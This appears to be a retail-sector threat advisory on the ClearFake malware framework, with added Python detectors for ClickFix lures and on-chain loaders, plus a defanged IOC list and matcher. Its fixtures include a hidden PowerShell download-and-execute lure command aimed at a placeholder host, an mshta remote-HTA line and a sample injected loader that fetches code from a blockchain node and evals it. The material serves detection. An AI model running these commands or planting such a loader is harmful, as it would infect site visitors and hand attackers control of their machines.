Context
Sekoia researchers have released updates on ClearFake, a malicious JavaScript framework that infects compromised websites to deliver malware through drive-by downloads and social engineering tactics. Initially observed in July 2023, ClearFake utilized fake browser update prompts to trick users into downloading malware. The latest 2025 variant introduces new lures, including fake reCAPTCHA and Cloudflare Turnstile verifications, to deceive users into executing malicious PowerShell commands. ClearFake continues to rely on EtherHiding, a technique that leverages Binance Smart Chain smart contracts to store and retrieve payloads, making its infrastructure difficult to disrupt. The framework has been observed distributing Lumma Stealer, Emmenhtal Loader, and Vidar Stealer, posing a significant global cybersecurity threat.
Community Impact
The latest ClearFake updates pose a serious risk to the retail and hospitality sectors, particularly e-commerce platforms and hotel booking websites that run on WordPress and other CMS platforms. By injecting malicious JavaScript into compromised websites, ClearFake can deceive customers into downloading malware disguised as a security update or as the fix for a fake technical problem. RH-ISAC Core Members are advised to maintain situational awareness of the updated tactics and capabilities of malware such as ClearFake and to review the intelligence and indicators of compromise included in this report below.
Technical Analysis
ClearFake represents an evolution in JavaScript-based malware frameworks, incorporating Web3 technology and blockchain infrastructure to improve persistence and evasion. Unlike a traditional drive-by download, a ClickFix lure instructs the user to copy a PowerShell command and run it themselves, typically from the Windows Run dialog, so execution begins with a deliberate user action and a process tree rooted in explorer.exe rather than in the browser, which endpoint security solutions are reluctant to classify as malicious.
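The process tree a ClickFix lure produces is the detection handle: the pasted command is spawned by explorer.exe (Win+R or the Explorer address bar) rather than by a browser or an installer, and its command line carries download-and-execute primitives, window-hiding flags and, frequently, a trailing comment copied from the fake verification page. The scorer below is an added example, not Sekoia's or RH-ISAC's code. It runs over constructed process-creation events (the hostnames are reserved .example.invalid names), the weights and threshold are this example's assumptions, and the mshta case assumes, as is common in ClickFix campaigns, that a remote file with a media-looking extension is fetched as HTA content.

```python
import ntpath
import re

# Process-creation events reduced to the fields the heuristic needs (the shape of a
# Sysmon Event ID 1 or EDR record). All four are constructed samples, not real telemetry.
SAMPLE_EVENTS = [
    {   # ClickFix: pasted into Win+R, so explorer.exe is the parent; lure comment appended
        "pid": 4412, "parent_image": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": 'powershell -w hidden -ep bypass -c "iex (iwr -UseBasicParsing '
                        'https://recaptcha-verify.example.invalid/)" '
                        '# "I am not a robot - reCAPTCHA Verification ID: 7392"',
    },
    {   # Scheduled maintenance script: a bypass flag alone is not enough to flag
        "pid": 4420, "parent_image": r"C:\Windows\System32\services.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\nightly-backup.ps1",
    },
    {   # Admin opening a shell from Explorer: interactive parent but nothing downloaded
        "pid": 4431, "parent_image": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": r'powershell.exe -NoProfile -Command "Get-ChildItem C:\Users\alice\Documents"',
    },
    {   # mshta variant of the lure: remote HTA fetched straight from the Run dialog
        "pid": 5108, "parent_image": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\mshta.exe",
        "command_line": "mshta https://human-verify.example.invalid/verify.mp4",
    },
]

# Win+R and the Explorer address bar both spawn their children from explorer.exe.
INTERACTIVE_PARENTS = {"explorer.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe"}

# Download-and-execute primitives typical of the pasted command.
DOWNLOAD_EXEC = re.compile(
    r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|iex|invoke-expression|mshta\s+https?:)",
    re.I)
# Flags used to hide the window and dodge execution policy.
HIDE_FLAGS = re.compile(
    r"(-w(indowstyle)?\s+hidden|-ep\s+bypass|-executionpolicy\s+bypass|-nop\b|-enc\b)", re.I)
# ClickFix commands commonly carry a trailing comment that mirrors the fake verification page.
LURE_COMMENT = re.compile(r"(i am not a robot|recaptcha|verification id|human verification)", re.I)


def score_event(event):
    """Return (score, reasons) for one process-creation event; weights are assumptions."""
    parent = ntpath.basename(event["parent_image"]).lower()
    image = ntpath.basename(event["image"]).lower()
    cmd = event["command_line"]
    score, reasons = 0, []
    if image not in SCRIPT_HOSTS:
        return 0, reasons
    if parent in INTERACTIVE_PARENTS:
        score += 2
        reasons.append("interactive parent " + parent)
    if DOWNLOAD_EXEC.search(cmd):
        score += 2
        reasons.append("download-and-execute primitive")
    if HIDE_FLAGS.search(cmd):
        score += 1
        reasons.append("hidden window / policy bypass")
    if LURE_COMMENT.search(cmd):
        score += 3
        reasons.append("verification lure comment")
    return score, reasons


def find_clickfix(events, threshold=4):
    """Return the events whose score meets the threshold, highest score first."""
    hits = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append({"pid": ev["pid"], "score": score, "reasons": reasons})
    return sorted(hits, key=lambda h: -h["score"])


if __name__ == "__main__":
    for hit in find_clickfix(SAMPLE_EVENTS):
        print(hit["pid"], hit["score"], "; ".join(hit["reasons"]))
```

The benign samples show why the parent alone or a bypass flag alone must not fire: scheduled scripts legitimately run with ExecutionPolicy Bypass, and administrators do open shells from Explorer. What separates the lure is the combination of an interactive parent with a download-and-execute primitive, and the verification comment is close to a unique signature when present.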
The use of Binance Smart Chain for payload hosting and AES key management is a significant advancement in cybercriminal infrastructure. The injected script reads the next stage from a smart contract on Binance Smart Chain (an EVM-compatible chain, hence the Ethereum-style contracts). Contract state can only be changed by whoever controls the contract, so defenders cannot remove the payload, while the operators can update it whenever they want to rotate payloads. This decentralized hosting model keeps ClearFake operational even when its C2 domains are taken down. The one fixed dependency is that the victim's browser must still reach a public BSC JSON-RPC node, so JSON-RPC traffic to such nodes from ordinary web browsing sessions is worth monitoring.
Additionally, Cloudflare Pages is being abused to host the AES-encrypted payloads, with the keys needed to decrypt them retrieved from the smart contract, which adds an extra layer of obfuscation. The combination of JavaScript injection, blockchain interaction, and social engineering makes ClearFake a highly adaptable, scalable, and persistent threat.
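Because the loader has to sit in the compromised page's HTML to do its job, a site owner can look for its structural features rather than for a particular script hash. The scanner below is an added example (not code from Sekoia, RH-ISAC or ClearFake itself) that flags inline scripts combining an on-chain read (a public BNB Smart Chain JSON-RPC endpoint or the eth_call method), a 20-byte contract address and an execution sink. The marker regexes, the constructed pages and the zero-address placeholder are all assumptions of this example; a production check would also fetch and scan externally sourced scripts.

```python
import re

# Markers an EtherHiding-style loader needs in order to work in the victim's browser:
# a JSON-RPC request to a public BNB Smart Chain node, the eth_call method, a 20-byte
# contract address, hex-to-text decoding of the returned blob, and a sink that runs it.
# These are this example's assumed heuristics, not indicators published by Sekoia.
MARKERS = {
    "bsc_rpc": re.compile(r"https?://[^\s\"']*(bsc-dataseed|binance\.org|bnbchain\.org)", re.I),
    "eth_call": re.compile(r"[\"']eth_call[\"']"),
    "contract_addr": re.compile(r"\b0x[0-9a-f]{40}\b", re.I),
    "hex_decode": re.compile(r"fromCharCode|parseInt\([^)]*,\s*16\)|hexToString|toUtf8", re.I),
    "exec_sink": re.compile(r"\beval\s*\(|\bFunction\s*\(|document\.write"),
}
SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)


def scan_html(html):
    """Return one finding per inline <script> whose body combines the loader markers."""
    findings = []
    for index, body in enumerate(SCRIPT_RE.findall(html)):
        hits = [name for name, rx in MARKERS.items() if rx.search(body)]
        fetches_chain = "bsc_rpc" in hits or "eth_call" in hits
        # A contract address alone (donation widget, dapp front end) is not enough:
        # require the on-chain read plus a sink that turns the returned bytes into code.
        if fetches_chain and "contract_addr" in hits and "exec_sink" in hits:
            findings.append({"script_index": index, "markers": hits})
    return findings


# Constructed page: a hotel site whose footer was injected with a loader of the shape
# described above. The zero address and call data are placeholders, not a real contract.
INJECTED_PAGE = """<html><body><h1>Book your stay</h1>
<script src="/wp-includes/js/jquery/jquery.min.js"></script>
<script>
(async () => {
  const rpc = "https://bsc-dataseed1.binance.org/";
  const req = {jsonrpc: "2.0", id: 1, method: "eth_call",
               params: [{to: "0x0000000000000000000000000000000000000000", data: "0x00000000"}, "latest"]};
  const res = await fetch(rpc, {method: "POST",
               headers: {"Content-Type": "application/json"}, body: JSON.stringify(req)});
  const hex = (await res.json()).result.slice(2);
  const js = hex.match(/.{2}/g).map(h => String.fromCharCode(parseInt(h, 16))).join("");
  eval(js);
})();
</script>
</body></html>"""

# Constructed clean page: mentions a wallet address but never reads the chain or executes data.
CLEAN_PAGE = """<html><body><h1>Book your stay</h1>
<script src="/wp-includes/js/jquery/jquery.min.js"></script>
<script>
  const DONATION_ADDRESS = "0x0000000000000000000000000000000000000000";
  document.getElementById("donate").textContent = DONATION_ADDRESS;
  fetch("/wp-json/booking/v1/availability").then(r => r.json()).then(render);
</script>
</body></html>"""

if __name__ == "__main__":
    print(scan_html(INJECTED_PAGE))  # one finding for the second script
    print(scan_html(CLEAN_PAGE))     # []
```

Requiring all three classes of marker keeps a legitimate Web3 front end or a crypto donation widget from firing; what no legitimate page does is read raw bytes from a contract and hand them to eval.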
Indicators of Compromise
Sekoia researchers have provided the following IOCs for ingestion at the earliest possible convenience. The entries are defanged (hxxp, [.]) and must be refanged before they are loaded into blocklists or detection content.
hxxps://ert67-o9.pages[.]dev/data
hxxps://f003.backblazeb2[.]com/file/skippp/uu.html
hxxps://f003.backblazeb2[.]com/file/skippp/index.html
hxxps://hostme.pages[.]dev/host
hxxps://ghost-name.pages[.]dev/website
hxxps://gdfg-23rwe.pages[.]dev/index.html
hxxps://sha-11x.pages[.]dev/
hxxps://b1-c1-k8.pages[.]dev/
hxxps://1a-a1.pages[.]dev/
hxxps://sdfwefwg.pages[.]dev/
hxxps://niopg.pages[.]dev/
hxxps://cleaning-devices-k.pages[.]dev/
hxxps://tour-agency-media.pages[.]dev/
hxxps://fresh-orange-juice.pages[.]dev/
hxxps://you-insk-bad.pages[.]dev/
hxxps://human-verify-7u.pages[.]dev/
hxxps://recaptcha-verify-me-1c.pages[.]dev/
hxxps://macos-browser-update-9n.pages[.]dev/
hxxps://macos-browser-update-5i.pages[.]dev/
hxxps://recaptcha-verify-2e.pages[.]dev/
hxxps://recaptcha-verify-7z.pages[.]dev/
hxxps://recaptcha-verify-1t.pages[.]dev/
hxxps://recaptcha-verify-9m.pages[.]dev/
hxxps://disable-data-collect-ai.pages[.]dev/
hxxps://recaptcha-verify-1r.pages[.]dev/
hxxps://recaptha-verify-5q.pages[.]dev/
hxxps://note1.nz7bn[.]pro/nnp.mp4
hxxps://ai.fdswgw[.]shop/one.mp4
hxxps://mnjk-jk.bsdfg-zmp-q-n[.]shop/1.mp4
hxxps://nbhg-v.iuksdfb-f[.]shop/ajax.mp3
hxxps://hur.bweqlkjr[.]shop/m41.mp4
hxxps://hur.bweqlkjr[.]shop/1a.m4a
hxxps://yob.yrwebsdf[.]shop/1a.m4a
hxxps://yob.yrwebsdf[.]shop/3t.mp4
hxxps://start.cleaning-room-device[.]shop/sha589.m4a
hxxps://discover-travel-agency[.]pro/joke.m4a
hxxps://discover-travel-agency[.]pro/walking.mp3
hxxps://discover-travel-agency[.]pro/1.m4a
hxxps://travel.image-gene-saver.it[.]com/1.m4a
hxxps://ads.green-pickle-jo[.]shop/1.m4a
hxxps://recaptcha-verify-4h[.]pro/kangarooing.m4a
hxxps://recaptcha-manual[.]shop/kangarooing.m4a
hxxps://recaptcha-verify-4h[.]pro/xfiles/kangarooing.vsdx
hxxps://recaptcha-verify-4h[.]pro/xfiles/verify.mp4
hxxps://human-verify[.]shop/xfiles/verify.mp4
hxxps://human-verify-4r[.]pro/xfiles/verify.mp4
hxxps://human-verify-4r[.]pro/xfiles/human.cpp
hxxps://dns-verify-me[.]pro/xfiles/train.mp4
hxxp://83.217.208[.]130/xfiles/Ohio.mp4
hxxp://83.217.208[.]130/xfiles/VIDA.mp3
hxxp://83.217.208[.]130/xfiles/VIDA.mp4
hxxp://83.217.208[.]130/xfiles/trip.mp4
hxxp://83.217.208[.]130/xfiles/trip.psd
hxxp://80.64.30[.]238/trip.psd
hxxp://80.64.30[.]238/evix.xll
hxxps://raw.githubusercontent[.]com/fuad686337/tyu/refs/heads/main/BEGIMOT.xll
hxxps://domain[.]com/BEGIMOT.xll
hxxps://disable-data-ai-agent.pages[.]dev
hxxps://tumbl.design-x[.]xyz/glass.mp3
hxxps://f003.backblazeb2[.]com/file/skippp/glass.mp3
hxxps://sandbox.yunqof[.]shop/macan.mp3
hxxps://microsoft-dns-reload-1r.pages[.]dev
hxxps://microsoft-dns-reload-5q.pages[.]dev
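To make the list usable it has to be refanged, deduplicated and split into indicators that are safe to match on host (pages.dev subdomains are per-project, as are the attacker-registered .shop and .pro domains) and indicators on shared hosting (raw.githubusercontent.com, backblazeb2.com) where only the exact URL should be matched, otherwise the block hits every GitHub raw download in the enterprise. The Python below is an added example, not Sekoia's or RH-ISAC's tooling; it takes a subset of the IOCs above and runs them over constructed proxy log lines in a simplified "time client method url status" format that is this example's assumption.

```python
import ipaddress
import re
from urllib.parse import urlsplit

# A subset of the Sekoia IOCs listed above, pasted as published: the same entry twice,
# one entry whose domain is not defanged, and two entries on shared hosting.
RAW_IOCS = """
hxxps://ert67-o9.pages[.]dev/data
hxxps://f003.backblazeb2[.]com/file/skippp/uu.html
hxxps://recaptcha-verify-2e.pages[.]dev/
hxxps://recaptcha-verify-2e.pages[.]dev/
hxxps://discover-travel-agency.pro/joke.m4a
hxxp://83.217.208[.]130/xfiles/Ohio.mp4
hxxps://raw.githubusercontent[.]com/fuad686337/tyu/refs/heads/main/BEGIMOT.xll
"""

# Hosts shared by many unrelated users: match the exact URL, never the whole host.
SHARED_HOSTS = {"raw.githubusercontent.com", "f003.backblazeb2.com"}


def refang(ioc):
    """Turn hxxps://a[.]b into https://a.b; plain entries pass through unchanged."""
    s = re.sub(r"^hxxp", "http", ioc.strip(), flags=re.I)
    return s.replace("[.]", ".").replace("(.)", ".").replace("[:]", ":")


def url_key(url):
    """host/path without the scheme, so http and https variants hit the same entry."""
    parts = urlsplit(url)
    return parts.netloc.lower().rstrip(".") + (parts.path or "/")


def parse_iocs(text):
    """Refang, deduplicate and bucket the IOCs into ips, hosts and exact shared-host URLs."""
    urls = {refang(line) for line in text.splitlines() if line.strip()}
    hosts, ips, shared_urls = set(), set(), set()
    for url in urls:
        host = urlsplit(url).hostname.lower()
        try:
            ipaddress.ip_address(host)
            ips.add(host)
            continue
        except ValueError:
            pass
        if host in SHARED_HOSTS:
            shared_urls.add(url_key(url))
        else:
            hosts.add(host)
    return {"urls": urls, "hosts": hosts, "ips": ips, "shared_urls": shared_urls}


def match_url(url, iocs):
    """Return the reason a URL matches the IOC set, or None."""
    host = urlsplit(url).hostname
    if host is None:
        return None
    host = host.lower()
    if host in iocs["ips"]:
        return "ip " + host
    if host in iocs["hosts"]:
        return "host " + host
    if url_key(url) in iocs["shared_urls"]:
        return "url " + url_key(url)
    return None


def match_proxy_log(lines, iocs):
    """Scan 'time client method url status' lines and return (client, url, reason) hits."""
    hits = []
    for line in lines:
        fields = line.split()
        if len(fields) < 5:
            continue
        reason = match_url(fields[3], iocs)
        if reason:
            hits.append((fields[1], fields[3], reason))
    return hits


# Constructed proxy log lines, not real traffic.
SAMPLE_LOG = [
    "2025-03-20T10:15:02Z 10.1.2.33 GET https://recaptcha-verify-2e.pages.dev/ 200",
    "2025-03-20T10:15:04Z 10.1.2.33 GET https://raw.githubusercontent.com/torvalds/linux/master/README 200",
    "2025-03-20T10:15:09Z 10.1.2.57 GET https://raw.githubusercontent.com/fuad686337/tyu/refs/heads/main/BEGIMOT.xll 200",
    "2025-03-20T10:16:11Z 10.1.2.57 GET http://83.217.208.130/xfiles/trip.psd 200",
    "2025-03-20T10:17:00Z 10.1.2.80 GET https://www.example.com/ 200",
    "2025-03-20T10:18:31Z 10.1.2.80 GET https://discover-travel-agency.pro/walking.mp3 200",
]

if __name__ == "__main__":
    for client, url, reason in match_proxy_log(SAMPLE_LOG, parse_iocs(RAW_IOCS)):
        print(client, reason, url)
```

Matching the IP and the attacker-controlled domains on host rather than on full URL is deliberate: the path components in this list (trip.psd, 1.m4a, verify.mp4) rotate far faster than the hosting, so a client that fetched any path from 83.217.208[.]130 is of interest, while the unrelated GitHub download in the sample log correctly stays silent.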